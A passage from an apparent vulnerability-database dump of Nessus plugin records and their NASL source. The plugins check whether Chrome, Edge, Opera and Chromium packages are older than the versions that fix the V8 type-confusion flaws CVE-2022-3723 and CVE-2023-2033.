value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has a package installed that is affected by a vulnerability as referenced in the\nopenSUSE-SU-2022:10219-1 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 107.0.5304.87 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (Chromium security severity: High) (CVE-2022-3723)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/M3YSR5SGLX4ZWKZX5LU5PNOXUXPMIUPR/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0dc5a900\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-3723\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected opera package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-3723\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/10/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/11/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/11/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:opera\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.4\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/SuSE/release');\nif (isnull(os_release) || os_release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar _os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:os_release);\nif (isnull(_os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\n_os_ver = _os_ver[1];\nif (os_release !~ \"^(SUSE15\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.4', os_release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + _os_ver, cpu);\n\nvar pkgs = [\n {'reference':'opera-93.0.4585.11-lp154.2.29.1', 'cpu':'x86_64', 'release':'SUSE15.4', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var _cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && _release) {\n if (rpm_check(release:_release, cpu:_cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'opera');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-21T12:57:37", "description": "The version of Google Chrome installed on the remote macOS host is prior to 112.0.5615.121. It is, therefore, affected by a vulnerability as referenced in the 2023_04_stable-channel-update-for-desktop_14 advisory.\n\n - Type Confusion in V8. (CVE-2023-2033)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-04-14T00:00:00", "type": "nessus", "title": "Google Chrome < 112.0.5615.121 Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-2033"], "modified": "2023-05-17T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_112_0_5615_121.NASL", "href": "https://www.tenable.com/plugins/nessus/174333", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(174333);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/17\");\n\n script_cve_id(\"CVE-2023-2033\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/05/08\");\n script_xref(name:\"IAVA\", value:\"2023-A-0203-S\");\n\n script_name(english:\"Google Chrome < 112.0.5615.121 Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is prior to 112.0.5615.121. It is, therefore, affected\nby a vulnerability as referenced in the 2023_04_stable-channel-update-for-desktop_14 advisory.\n\n - Type Confusion in V8. (CVE-2023-2033)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2023/04/stable-channel-update-for-desktop_14.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7311aaa4\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1432210\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 112.0.5615.121 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-2033\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('MacOSX/Google Chrome/Installed');\n\ngoogle_chrome_check_version(fix:'112.0.5615.121', severity:SECURITY_HOLE, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-27T12:58:07", "description": "The version of Microsoft Edge installed on the remote Windows host is prior to 107.0.1418.26. It is, therefore, affected by a vulnerability as referenced in the October 31, 2022 advisory.\n\n - Type Confusion in V8. (CVE-2022-3723)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-11-01T00:00:00", "type": "nessus", "title": "Microsoft Edge (Chromium) < 107.0.1418.26 Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-3723"], "modified": "2023-10-06T00:00:00", "cpe": ["cpe:/a:microsoft:edge"], "id": "MICROSOFT_EDGE_CHROMIUM_107_0_1418_26.NASL", "href": "https://www.tenable.com/plugins/nessus/166749", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(166749);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/06\");\n\n script_cve_id(\"CVE-2022-3723\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/11/18\");\n script_xref(name:\"IAVA\", value:\"2022-A-0453-S\");\n\n script_name(english:\"Microsoft Edge (Chromium) < 107.0.1418.26 Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an web browser installed that is affected by a vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Microsoft Edge installed on the remote Windows host is prior to 107.0.1418.26. It is, therefore, affected\nby a vulnerability as referenced in the October 31, 2022 advisory.\n\n - Type Confusion in V8. (CVE-2022-3723)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://docs.microsoft.com/en-us/DeployEdge/microsoft-edge-relnotes-security#october-31-2022\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ff54e40b\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-3723\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Microsoft Edge version 107.0.1418.26 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-3723\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/10/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/11/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_edge_chromium_installed.nbin\");\n script_require_keys(\"installed_sw/Microsoft Edge (Chromium)\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nvar app_info = vcf::get_app_info(app:'Microsoft Edge (Chromium)', win_local:TRUE);\nvar constraints = [\n { 'fixed_version' : '106.0.1370.61', 'fixed_display' : '106.0.1370.61 (Extended Stable Channel) / 107.0.1418.26 (Stable Channel)' },\n { 'min_version' : '107.0.1418.24', 'fixed_version' : '107.0.1418.26' }\n];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-21T12:57:57", "description": "The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the 6f0327d4-9902-4042-9b68-6fc2266944bc advisory.\n\n - Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) (CVE-2023-2033)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-04-15T00:00:00", "type": "nessus", "title": "FreeBSD : chromium -- multiple vulnerabilities (6f0327d4-9902-4042-9b68-6fc2266944bc)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-2033"], "modified": "2023-05-17T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:ungoogled-chromium", "p-cpe:/a:freebsd:freebsd:chromium"], "id": "FREEBSD_PKG_6F0327D4990240429B686FC2266944BC.NASL", "href": "https://www.tenable.com/plugins/nessus/174390", "sourceData": "#%NASL_MIN_LEVEL 80900\n#\n# (C) Tenable, Inc.\n#\n# @NOAGENT@\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(174390);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/17\");\n\n script_cve_id(\"CVE-2023-2033\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/05/08\");\n script_xref(name:\"IAVA\", value:\"2023-A-0203-S\");\n\n script_name(english:\"FreeBSD : chromium -- multiple vulnerabilities (6f0327d4-9902-4042-9b68-6fc2266944bc)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a\nvulnerability as referenced in the 6f0327d4-9902-4042-9b68-6fc2266944bc advisory.\n\n - Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (Chromium security severity: High) (CVE-2023-2033)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2023/04/stable-channel-update-for-desktop_14.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7311aaa4\");\n # https://vuxml.freebsd.org/freebsd/6f0327d4-9902-4042-9b68-6fc2266944bc.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ec7620dc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-2033\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/04/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ungoogled-chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"freebsd_package.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nvar flag = 0;\n\nvar packages = [\n 'chromium<112.0.5615.121',\n 'ungoogled-chromium<112.0.5615.121'\n];\n\nforeach var package( packages ) {\n if (pkg_test(save_report:TRUE, pkg: package)) flag++;\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : pkg_report_get()\n );\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-27T12:58:06", "description": "The version of Google Chrome installed on the remote macOS host is prior to 107.0.5304.87. It is, therefore, affected by a vulnerability as referenced in the 2022_10_stable-channel-update-for-desktop_27 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 107.0.5304.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) (CVE-2022-3723)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-10-27T00:00:00", "type": "nessus", "title": "Google Chrome < 107.0.5304.87 Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-3723"], "modified": "2023-10-06T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_107_0_5304_87.NASL", "href": "https://www.tenable.com/plugins/nessus/166630", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(166630);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/06\");\n\n script_cve_id(\"CVE-2022-3723\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/11/18\");\n script_xref(name:\"IAVA\", value:\"2022-A-0453-S\");\n\n script_name(english:\"Google Chrome < 107.0.5304.87 Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is prior to 107.0.5304.87. It is, therefore, affected by\na vulnerability as referenced in the 2022_10_stable-channel-update-for-desktop_27 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 107.0.5304.87 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (Chromium security severity: High) (CVE-2022-3723)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2022/10/stable-channel-update-for-desktop_27.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?88b3eec6\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1378239\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 107.0.5304.87 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-3723\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/10/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/10/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('MacOSX/Google Chrome/Installed');\n\ngoogle_chrome_check_version(fix:'107.0.5304.87', severity:SECURITY_HOLE, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-27T12:58:06", "description": "The remote Debian 11 host has packages installed that are affected by a vulnerability as referenced in the dsa-5263 advisory.\n\n - Type Confusion in V8. (CVE-2022-3723)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-10-30T00:00:00", "type": "nessus", "title": "Debian DSA-5263-1 : chromium - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-3723"], "modified": "2023-10-06T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:11.0", "p-cpe:/a:debian:debian_linux:chromium", "p-cpe:/a:debian:debian_linux:chromium-driver", "p-cpe:/a:debian:debian_linux:chromium-l10n", "p-cpe:/a:debian:debian_linux:chromium-common", "p-cpe:/a:debian:debian_linux:chromium-shell", "p-cpe:/a:debian:debian_linux:chromium-sandbox"], "id": "DEBIAN_DSA-5263.NASL", "href": "https://www.tenable.com/plugins/nessus/166704", "sourceData": "#%NASL_MIN_LEVEL 80900\n#\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory dsa-5263. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(166704);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/06\");\n\n script_cve_id(\"CVE-2022-3723\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/11/18\");\n script_xref(name:\"IAVA\", value:\"2022-A-0453-S\");\n\n script_name(english:\"Debian DSA-5263-1 : chromium - security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Debian 11 host has packages installed that are affected by a vulnerability as referenced in the dsa-5263\nadvisory.\n\n - Type Confusion in V8. (CVE-2022-3723)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/source-package/chromium\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/security/2022/dsa-5263\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2022-3723\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/bullseye/chromium\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the chromium packages.\n\nFor the stable distribution (bullseye), this problem has been fixed in version 107.0.5304.87-1~deb11u1.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-3723\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/10/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/10/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/10/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-driver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-l10n\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-sandbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-shell\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:11.0\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar debian_release = get_kb_item('Host/Debian/release');\nif ( isnull(debian_release) ) audit(AUDIT_OS_NOT, 'Debian');\ndebian_release = chomp(debian_release);\nif (! preg(pattern:\"^(11)\\.[0-9]+\", string:debian_release)) audit(AUDIT_OS_NOT, 'Debian 11.0', 'Debian ' + debian_release);\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Debian', cpu);\n\nvar pkgs = [\n {'release': '11.0', 'prefix': 'chromium', 'reference': '107.0.5304.87-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-common', 'reference': '107.0.5304.87-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-driver', 'reference': '107.0.5304.87-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-l10n', 'reference': '107.0.5304.87-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-sandbox', 'reference': '107.0.5304.87-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-shell', 'reference': 